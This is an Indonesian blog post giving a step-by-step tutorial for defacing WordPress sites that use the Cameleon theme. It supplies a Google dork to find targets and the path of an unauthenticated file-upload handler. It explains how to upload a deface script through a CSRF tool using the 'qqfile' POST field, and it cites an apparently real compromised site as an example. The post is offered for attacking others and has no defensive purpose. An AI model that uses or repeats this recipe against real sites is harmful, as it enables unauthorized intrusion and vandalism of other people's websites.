Assalamualaikum wr wb
Kembali lagi dengan Sayah Randi;v
Oke jangan banyak bacot langsung aja ke tutor nya;v
• Bahan bahan :
1. Android/PC
2. kuota/WiFi
3. Script Deface
4. Tools Crsf > Touch Me Senpai
> Dork :
- inurl:/wp-content/themes/cameleon/
> Exploit :
- /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
• Langkah- langkah :
Pertama kalian dorking google dulu pakek dork di atas.
Nahh kalo udah pilih salah satu web nya.
Nahh sekarang tinggal nentuin vuln apa kaga nya.Caranya? Masukin exploit di atas.
Ex : www.target.coli/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
Kalo vuln kek gambar di bawah ini.
Nah klo udah begitu kita tinggal ke crsf nya
Kolom URL isi link web vuln tadi,POST File isi dengan qqfile kemudian klik Kunci.
Klik Pilih File kemudian pilih file lu abis itu klik Upload.Klo berhasil tandanya muncul kata Succes BLA BLA BLA:V
Tinggal kita panggil dah:v
• www.target.co.li/wp-content/uploads/tahun/bulan/namasc.html
Contohnya :
• http://www.silvertrading.pe/wp-content/uploads/2019/12/Apa-itu.html
Sekian dari saya bye bye;v
Komentar
Posting Komentar